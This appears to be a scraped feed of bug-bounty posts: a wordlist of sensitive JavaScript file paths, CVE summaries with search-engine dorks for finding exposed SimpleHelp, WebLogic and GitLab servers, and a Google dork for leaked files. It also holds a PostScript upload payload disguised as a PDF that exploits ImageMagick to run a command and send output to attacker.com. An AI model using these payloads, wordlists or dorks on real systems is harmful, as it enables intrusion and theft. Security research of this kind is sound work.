/js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js
/js/policies.js
/js/permissions.js
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js
CVE-2024-57726, -57727, -57728: Multiple vulnerabilities in SimpleHelp, 7.2 - 8.8 rating
The vulnerabilities allow attackers to upload arbitrary files to the SimpleHelp server, as well as escalate privileges, which together allow RCE to be carried out.
Search at Netlas.io:
Link: https://nt.ls/Frx6H
Dork: http.headers.server:"SimpleHelp"
Vendor's advisory: https://simple-help.com/kb---security-vulnerabilities-01-2025#
Smart contract security report. It contains 2 High, 6 Medium & 8 Low severity issues.
https://github.com/gkrastenov/audits/blob/main/solo/SpartaDex-Security-Review.md
https://solodit.cyfrin.io/
All disclosed web3 protocols vulnerability reports with filters (like Hacktivity)
Cyfrin Solodit
Smart Contract Vulnerability Dataset - Cyfrin Solodit
Explore the world's largest data set of smart contract vulnerabilities, findings, and mitigations. Strengthen protocol and dApp security, research bugs before deployment.
Does anyone have Aura+ Songs Playlist? Do drop in comments! Thank you.
Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf"
Content-Type: application/pdf
%!PS
currentdevice null true mark /OutputICCProfile (%pipe%curl https://attacker.com/?a=$(whoami|base64) ).putdeviceparams
quit
HackerOne
Semrush disclosed on HackerOne: Remote Code Execution on...
The Logo upload in the report constructor at: https://www.semrush.com/my_reports/constructor
{F340480}
is passed through a not properly patched version of ImageMagick. You can use Postscript to...
WayBackup Finder - A passive way to find backups/sensitive information.
https://github.com/anmolksachan/WayBackupFinder
CVE-2025-21535: Server Takeover in Oracle WebLogic, 9.8 rating
An easily exploitable vulnerability in the Core component allows an unauthenticated attacker to remotely compromise a WebLogic server.
Search at Netlas.io:
Link: https://nt.ls/6EpWK
Dork: protocol:t3 OR protocol:t3s
Vendor's advisory: https://www.oracle.com/security-alerts/cpujan2025.html#AppendixFMW
Brut Security pinned «Explore Bug Bounty POC Videos: https://t.iss.one/brutsecurity_poc»
jasper-join-7e5 on Notion
IDOR Cheat Sheet | Notion
What if I told you that there is a web application vulnerability so simple to exploit, that it could make bug hunting feel like a breeze?
New Business Logic POC Video Shared - https://t.iss.one/brutsecurity_poc/9
CVE-2025-0314 and others: Multiple vulnerabilities in GitLab, 4.3 - 8.7 rating
In a recent advisory, GitLab wrote about three vulnerabilities, including stored XSS, resource exhaustion, and protected CI/CD variables exfiltration.
Search at Netlas.io:
Link: https://nt.ls/BNKS8
Dork: http.favicon.hash_sha256:72a2cad5025aa931d6ea56c3201d1f18e68a8cd39788c7c80d5b2b82aa5143ef OR http.headers.set_cookie:"gitlab" OR http.headers.location:"gitlab"
Vendor's advisory: https://about.gitlab.com/releases/2025/01/22/patch-release-gitlab-17-8-1-released/
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)